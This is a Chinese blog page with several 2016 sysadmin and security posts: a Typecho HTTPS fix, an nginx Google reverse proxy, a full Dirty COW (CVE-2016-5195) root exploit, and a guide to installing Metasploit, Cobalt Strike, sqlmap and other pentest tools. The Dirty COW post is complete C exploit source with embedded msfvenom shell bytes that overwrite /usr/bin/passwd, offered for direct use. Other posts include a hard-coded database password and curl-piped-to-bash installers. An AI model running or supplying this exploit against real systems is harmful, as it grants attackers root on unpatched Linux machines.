Typecho博客全站Https后样式报错解决方法

作者:Secer 发布时间:December 11, 2016 分类:Linux笔记,原创文章

由于博客被墙了,不知道是因为什么原因,又不想换域名,干脆整站上HTTPS吧。
我用的是CDN厂商CloudFlare 提供的免费证书。无需服务器部署直接在CDN后台设置页面规则即可,服务器只需在nginx配置里添加监听443端口:

# NOTE(review): without the `ssl` parameter this accepts plain HTTP on port 443. The post terminates TLS at
# the CDN, so the CDN-to-origin hop is unencrypted with this setting — confirm the CDN mode expects that.
listen 443

然而……typecho部署https后,出现不能加载http资源的问题

修改源码/var/Typecho/Common.php一个地方即可,加个替换
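/**
 * Turn a path into a link under the given prefix.
 *
 * A plain-http result has its scheme dropped so the link is protocol-relative
 * ("//host/path") and inherits whatever scheme the page itself was loaded with;
 * an https prefix is left untouched. Upstream Typecho returns the joined link as-is.
 *
 * @access public
 * @param string $path   path; a leading "./" is removed
 * @param string $prefix prefix, normally the site URL including the scheme
 * @return string
 */
public static function url($path, $prefix)
{
    $path = (0 === strpos($path, './')) ? substr($path, 2) : $path;
    $link = rtrim($prefix, '/') . '/' . str_replace('//', '/', ltrim($path, '/'));
    // Strip only a leading "http:". A blanket str_replace would also mangle an "http:"
    // that appears later in the link, e.g. inside a query-string value.
    $scheme = 'http:';
    return (0 === strpos($link, $scheme)) ? substr($link, strlen($scheme)) : $link;
}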

这样,不论当前环境是http还是https都能很好的继承协议了,不再出现HTTPS由于安全问题不能加载http混合内容的问题。

反代Google

作者:Secer 发布时间:November 1, 2016 分类:Linux笔记

有时候没上代理方便查资料,直接开个谷歌反代服务吧,配置过程如下

安装nginx略

编辑nginx配置文件

vim /usr/local/nginx/conf/nginx.conf
在http部分加入以下内容

# Proxy tuning for the http {} context: upstream timeouts, response buffers and on-disk temp/cache storage.
proxy_connect_timeout 5;
proxy_read_timeout 60;
proxy_send_timeout 5;
proxy_buffer_size 16k;
proxy_buffers 4 64k;
proxy_busy_buffers_size 128k;
proxy_temp_file_write_size 128k;
# NOTE(review): both paths live under /tmp, a world-writable directory — confirm that is intended for
# a directory nginx writes proxied response bodies into.
proxy_temp_path /tmp/cache/temp;
# The "cache_one" zone is declared here but the server block below never enables it (no proxy_cache
# directive), so it is effectively unused.
proxy_cache_path /tmp/cache/path levels=1:2 keys_zone=cache_one:5m inactive=7d max_size=1g;

保存然后编辑虚拟机配置文件

vim /usr/local/nginx/conf/vhost/g.yh.gs.conf
将server段替换为下面的内容

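server
{
        # NOTE(review): plain-HTTP listener, so the Basic-Auth credentials and every proxied page cross the
        # network unencrypted; a `listen 443 ssl` listener with a certificate would close that gap.
        listen 80;
        server_name google.cker.in;

        location / {
                proxy_redirect off; #http://www.google.com/ /;

                proxy_set_header HOST 'www.google.com';
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_cookie_domain google.com google.cker.in;
                # Upstream is addressed by IP (taken from the dig output further down). nginx does not check
                # the upstream certificate unless proxy_ssl_verify is enabled, so this hop trusts whatever
                # answers on that address.
                proxy_pass https://74.125.23.139;
                # Empty Accept-Encoding keeps the upstream body uncompressed so sub_filter can rewrite it.
                proxy_set_header Accept-Encoding "";
                proxy_set_header User-Agent $http_user_agent;
                proxy_set_header Accept-Language "en-US";
                # One fixed cookie is sent upstream for every client; their own Google cookies are not forwarded.
                proxy_set_header Cookie "PREF=ID=047808f19f6de346:U=0f62f33dd8549d11:FF=2:LD=zh-CN:NW=1:TM=1325338577:LM=1332142444:GM=1:SG=2:S=rE0SyJh2W1IQ-Maw";
                sub_filter www.google.com google.cker.in;
                sub_filter_once off;
                # The realm string is returned to every visitor in the WWW-Authenticate header, so it must
                # never contain the username or password themselves.
                auth_basic    "Restricted";
                # Relative path: resolved against the nginx prefix (the conf directory), so the file generated
                # with htpasswd below has to be placed there — TODO confirm.
                auth_basic_user_file    auth_google.cker.in;

        }
}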

 

其中74.125.23.139是指google.com的ip,可以到网上找找,或在国外VPS上解析一下

dig google.com @8.8.8.8

; <<>> DiG 9.8.3-P1 <<>> google.com @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21253
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;google.com.            IN    A

;; ANSWER SECTION:
google.com.        299    IN    A    74.125.23.139
google.com.        299    IN    A    74.125.23.102
google.com.        299    IN    A    74.125.23.101
google.com.        299    IN    A    74.125.23.100
google.com.        299    IN    A    74.125.23.113
google.com.        299    IN    A    74.125.23.138

生成401认证密文

# Generate the Basic-Auth credential file: -c creates the file, -b takes the password from the command line
# (so it ends up in shell history), -d and -m both pick a hash (crypt vs. MD5) — only the last one given applies.
➜  ~ htpasswd -dmbc auth_google.cker.in cker cker
Adding password for user cker
# NOTE(review): this reads a file named "cker", not the auth_google.cker.in just written — likely a paste slip.
➜  ~ cat cker             
cker:***********

 

保存后测试下配置文件是否有问题

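# -t only parses and validates the configuration; nothing is reloaded (the option is a plain ASCII "-t").
/usr/local/nginx/sbin/nginx -t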

如果出现下面的两句说明配置文件一切正常
nginx: the configuration file /usr/local/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/nginx/conf/nginx.conf test is successful

确认没有问题后平滑重启nginx

kill -HUP `cat /usr/local/nginx/logs/nginx.pid`

访问效果

image

image

dirty cow Linux通杀提权EXP

作者:Secer 发布时间:October 26, 2016 分类:Linux笔记

 

CVE-2016-5195 dirty cow

影响范围:2007-2016 Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复)

测试debian/centos/ubuntu/ x86/x86_64可用,有一定几率失败

 

用法看说明

EXP:

/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
* 
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c  -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
* madvise 0
* ptrace 0
* $ /usr/bin/passwd 
* [[email protected] foo]# whoami 
* root
* [[email protected] foo]# id
* uid=0(root) gid=501(foo) groups=501(foo)
* @KrE80r
*/
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";

/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/ 
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;

/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/

void *madviseThread(void *arg) {
  int i,c=0;
  for(i=0;i<200000000;i++)
    c+=madvise(map,100,MADV_DONTNEED);
  printf("madvise %d\n\n",c);
}


int main(int argc,char *argv[]){

  printf("                                \n\
   (___)                                   \n\
   (o o)_____/                             \n\
    @@ `     \\                            \n\
     \\ ____, /%s                          \n\
     //    //                              \n\
    ^^    ^^                               \n\
", suid_binary);
  char *backup;
  printf("DirtyCow root privilege escalation\n");
  printf("Backing up %s to /tmp/bak\n", suid_binary);
  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  system(backup);

  f=open(suid_binary,O_RDONLY);
  fstat(f,&st);
  map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %x\n\n",map);
  pid=fork();
  if(pid){
    waitpid(pid,NULL,0);
    int u,i,o,c=0,l=sc_len;
    for(i=0;i<10000/l;i++)
      for(o=0;o<l;o++)
        for(u=0;u<10000;u++)
          c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
    printf("ptrace %d\n\n",c);
   }
  else{
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(),SIGSTOP);
    pthread_join(pth,NULL);
    }
  return 0;
}

漏洞概述:

该漏洞具体为,Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.)

竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

根据官方发布的补丁信息,这个问题可以追溯到2007年发布的Linux内核。现在还没有任何证据表明,2007年后是否有黑客利用了这个漏洞。不过安全专家Phil Oester称发现一名攻击者利用该漏洞部署攻击,并向Red Hat通报了最近的攻击事件。

修复方法:

进行Linux内核维护的Greg Kroah-Hartman宣布针对Linux 4.8、4.7和4.4 LTS内核系列的维护更新(更新后为Linux kernel 4.8.3、4.7.9和4.4.26 LTS),修复了该漏洞。目前新版本已经登陆各GNU/Linux发行版库,包括Arch Linux(测试中)、Solus和所有受支持版本的Ubuntu。Debian开发人员前天也宣布稳定版Debian GNU/Linux 8 “Jessie”系列内核重要更新——本次更新总共修复4个Linux内核安全漏洞,其中也包括了脏牛。

各操作系统供应商应该即刻下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS,为用户提供稳定版渠道更新。

Debian 8.3 Mate搭建渗透测试环境

作者:Secer 发布时间:July 21, 2016 分类:Linux笔记

Debian 8.3 Mate 下载地址
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/
http://cdimage.debian.org/debian-cd/8.3.0-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
#Ubuntu Mate ISO http://cdimage.ubuntu.com/ubuntu-mate/releases/15.04/release/ubuntu-mate-15.04-desktop-amd64.iso

 

Debian 安装msf # ruby2.3.1

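# Required build/runtime packages (a few names are listed twice; apt-get tolerates that). The option is a plain ASCII "-y".
apt-get install pptp-linux network-manager-pptp build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl nmap libsqlite3-dev default-jdk screen subversion -y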

ruby用rvm装吧

# Install Ruby through RVM.
# Imports the RVM release-signing key — presumably used by the installer to verify the RVM archive; confirm for this installer version.
$ curl -sSL https://rvm.io/mpapis.asc | gpg --import -
# NOTE(review): the installer script is piped straight into bash without being read; download it to a file
# and inspect it first on any host that matters.
$ \curl -sSL https://get.rvm.io | bash -s stable
# If the connection above fails, try:
$ curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
$ source /etc/profile.d/rvm.sh
rvm install ruby-2.3.1
#rvm install ruby-2.1.8
rvm use 2.3.1 --default
gem install bundler

 

apt-get install rubygems-integration rubygems
gem install wirble sqlite3 bundler
### The errors below are all caused by an unstable domestic network; using a VPN resolves them ##
# Error "Unable to download data from https://rubygems.org/ - Errno::ECONNRESET: Connection reset by peer - SSL_connect", fix as follows:

# Adds the missing CA root to rubygems' bundled cert store. NOTE(review): the AddTrust External root expired in
# 2020, so on a current system this step no longer helps — update the ca-certificates/rubygems packages instead.
wget https://raw.githubusercontent.com/rubygems/rubygems/master/lib/rubygems/ssl_certs/AddTrustExternalCARoot-2048.pem
gem which rubygems
/usr/lib/ruby/2.1.0/rubygems.rb
# NOTE(review): the wget above saves into the current directory while this cp reads ~/Downloads — one of the two paths needs adjusting.
cp ~/Downloads/AddTrustExternalCARoot-2048.pem /usr/lib/ruby/2.1.0/rubygems/ssl_certs/
gem install wirble sqlite3 bundler

排错:

# When downloading over https, there may be an SSL error; then: gem sources --remove https://rubygems.org; gem sources --add http://rubygems.org  or  bundle config mirror.https://rubygems.org https://ruby.taobao.org
# NOTE(review): switching the gem source (or the Gemfile `source` line shown below) to plain http gives up
# transport integrity for every gem installed — anything on the network path can substitute gems. Prefer
# repairing the CA bundle (above) or the https mirror option, which keeps integrity.
head -1 /path/to/metasploit-framework/Gemfile
source 'http://rubygems.org'

 

设置Postgresql数据库及用户

# Create the Metasploit database role and database as the postgres superuser.
sudo -s
su postgres
# -P prompts for a password; -S/-R/-D: not a superuser, cannot create roles, cannot create databases.
createuser msf -P -S -R -D
Enter password for new role: ***
Enter it again: ***
createdb -O msf msf
exit

cd /opt/; git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
bundle install
# Symlink every msf* launcher into PATH. `ls msf*` runs in the current directory, so this only works
# while still inside /opt/metasploit-framework.
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml

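# Metasploit database connection. The keys must be nested under "production:"; unindented they would be
# parsed as separate top-level keys and the production entry would be empty.
production:
  adapter: postgresql
  database: msf
  username: msf
  # Must match the password entered when the msf role was created; "msf" is only the example value.
  password: msf
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5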


# Point Metasploit at the database config for every login shell (system-wide via /etc/profile).
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
### per-user alternative: append to ~/.bashrc instead of /etc/profile
### sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> ~/.bashrc"
source /etc/profile
安装中文输入法
apt-get install ibus ibus-googlepinyin ibus-sunpinyin

 

安装Armitage

# Fetch and install Armitage under /opt.
# NOTE(review): the tarball is fetched over plain http with no checksum or signature check and its contents are
# then executed as Java code — verify the archive out of band, or use an https source if one is available.
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
tar -xvzf /tmp/armitage.tgz -C /opt
ln -s /opt/armitage/armitage /usr/local/bin/armitage
ln -s /opt/armitage/teamserver /usr/local/bin/armitage_teamserver
# Overwrites the shipped launcher with a one-liner that forwards all arguments to the jar.
sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
# Rewrites the jar reference in teamserver to an absolute path — presumably so it starts from any directory.
perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

安装CobaltStrike
US代理,获取cobaltstrike

# Install Cobalt Strike under /opt (licensed download; the tar step assumes the browser saved it as /tmp/cobaltstrike.tgz).
firefox https://www.cobaltstrike.com/download
tar -xvzf /tmp/cobaltstrike.tgz -C /opt
ln -s /opt/cobaltstrike/cobaltstrike /usr/local/bin/cobaltstrike
ln -s /opt/cobaltstrike/teamserver /usr/local/bin/cobaltstrike_teamserver
# Overwrites the shipped launcher with a one-liner that forwards all arguments to the jar.
sh -c "echo java -jar /opt/cobaltstrike/cobaltstrike.jar \$\* > /opt/cobaltstrike/cobaltstrike"
#perl -pi -e 's/cobaltstrike.jar/\/opt\/cobaltstrike\/cobaltstrike.jar/g' /opt/cobaltstrike/teamserver

安装SQLMap

cd /usr/share/; git clone https://github.com/sqlmapproject/sqlmap.git
ln -s /usr/share/sqlmap/sqlmap.py /usr/bin/sqlmap

安装Bettercap

apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap
gem update bettercap

安装 DNSEnum

DNSenum http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz
git clone https://github.com/fwaeytens/dnsenum.git
cd dnsenum/
安装缺失的模块:cpan XXX::xxx

安装 fierce

$ cd /usr/share
$ svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/
$ cd fierce2/
$ perl Makefile.PL
$ make
$ make test
$ make install
$ ln -s /usr/local/bin/fierce /usr/share/fierce2/fierce
$ mkdir -p /pentest/enumeration/fierce/
$ ln -s /usr/local/bin/fierce /pentest/enumeration/fierce/fierce

cpan Net::DNS #安装缺失的库
cpan Net::DNS::Resolver #貌似可以解决报错 improperly terminated AXFR at D:\tools\fierce-0.9.9\fierce.pl line 228.

安装WPScan

Installing on Debian:
sudo apt-get install git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
cd /usr/share/; git clone https://github.com/wpscanteam/wpscan.git
cd wpscan

gem install bundler && bundle install --without test --path vendor/bundle
alias wpscan='ruby /usr/share/wpscan/wpscan.rb --enumerate u --enumerate p --enumerate t --url '

或者安装Docker后安装Docker的wpscan

docker pull wpscanteam/wpscan
docker run --rm wpscanteam/wpscan -u http://yourblog.com [options]

 

安装PPTP VPN支持

apt-get install network-manager-openvpn network-manager-pptp network-manager-pptp-gnome network-manager-vpnc
service network-manager restart

 

 

安装GuardScan

# Python prerequisites for GuardScan.
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
pip install tornado
# Install an LNMP stack with the vpser one-click script, kept alive in a screen session.
# NOTE(review): the lnmp archive is fetched over plain http and install.sh is then run unreviewed with root
# privileges — verify the archive out of band before running it.
apt-get install screen
screen -S lnmp
wget -c http://soft.vpser.net/lnmp/lnmp1.2-full.tar.gz && tar zxf lnmp1.2-full.tar.gz && cd lnmp1.2-full && ./install.sh lnmp
#wget -c http://soft.vpser.net/lnmp/lnmp1.3beta-full.tar.gz && tar zxf lnmp1.3beta-full.tar.gz && cd lnmp1.3beta-full && ./install.sh lnmp

 

mysql

-- Create the GuardScan database, load its schema and create the application user.
create database pscan;
use pscan;
source pscan.sql
-- NOTE(review): 'pscan'@'%' accepts logins from any host, and the password is a fixed literal copied from
-- the post. Restrict the host to where conn.php actually connects from (e.g. 'localhost' if the web app
-- runs on the same machine) and use your own password, identically in both statements.
CREATE USER 'pscan'@'%' IDENTIFIED BY 'RFwPauXUhF4sWtSq';GRANT USAGE ON *.* TO 'pscan'@'%' IDENTIFIED BY '***' REQUIRE NONE WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;GRANT ALL PRIVILEGES ON `pscan`.* TO 'pscan'@'%';

修改conn.php中的数据库信息
修改 ./proxy/isqlmap.py
self.webserver="http://localhost:88/"
改成你自己的主机地址和端口。
修改./proxy/task.py
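def update():
    """Issue a GET to the GuardScan web API's sqlmap_update endpoint (fire-and-forget).

    Replace localhost:88 with the host and port the GuardScan web app is actually served on.
    """
    url = "http://localhost:88/api.php?type=sqlmap_update"
    urllib2.urlopen(url).read()


def api_get():
    """Fetch the api_get response from the GuardScan web API.

    Only the request is shown here; the original task.py presumably goes on to
    process `data` — confirm against the full file.
    """
    url = "http://localhost:88/api.php?type=api_get"
    data = urllib2.urlopen(url).read()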
改成你的host地址


配置
打开 http://localhost:88/config.php 在list里面添加sqlmapapi节点
格式为
http://127.0.0.1:8775 (不需要最后一个/)
浏览器设置代理,并且添加一个http header
User-Hash: youhash


使用
首先运行sqlmapapi,并且在config里面增加至少一个节点
cd proxy/
python proxy_io.py 8080&
python task.py&
然后将浏览器代理设置为
http 127.0.0.1 8080
然后一顿请求之后可以打开
http://localhost:88/config.php

 

仅作记录,呵呵 工具党。